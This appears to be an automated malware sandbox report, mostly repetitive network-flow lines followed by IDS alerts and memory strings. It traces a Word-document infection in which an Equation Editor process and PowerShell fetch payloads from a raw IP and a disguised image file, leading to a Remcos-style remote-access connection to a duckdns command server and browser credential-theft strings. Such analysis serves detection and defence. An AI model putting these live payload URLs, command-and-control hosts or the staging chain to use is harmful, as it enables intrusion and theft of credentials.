                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443

                  Networking

                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 45.89.247.65:2201
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 45.89.247.65:2201
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.239.241.184:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.239.241.184:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: Malware configuration extractorURLs: dremom2.duckdns.org
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pohttps://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_image_vbs.jpg
                  Source: powershell.exe, 00000007.00000002.364796787.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Onion-Location: https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_image_vbs.jpg
                  Source: unknownDNS query: name: dremom2.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 45.89.247.65:2201
                  Source: global trafficHTTP traffic detected: GET /download/new_image_vbs/new_image_vbs.jpg HTTP/1.1Host: archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /35/WERFFG.txt HTTP/1.1Host: 85.239.241.184Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 207.241.224.2 207.241.224.2
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewASN Name: CASABLANCA-ASInternetCollocationProviderCZ CASABLANCA-ASInternetCollocationProviderCZ
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /35/wescreenthepicturewithbuttersmoothpy.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.239.241.184Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C062474-9095-4952-BF9E-824EBC6F940A}.tmpJump to behavior
                  Source: bhv5928.tmp.11.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv5928.tmp.11.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: archive.org
                  Source: global trafficDNS traffic detected: DNS query: dremom2.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/WERFFG.txt
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF
                  Source: EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF)
                  Source: EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFce
                  Source: EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFj
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.875109899.0000000000572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000007.00000002.364637845.00000000002FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
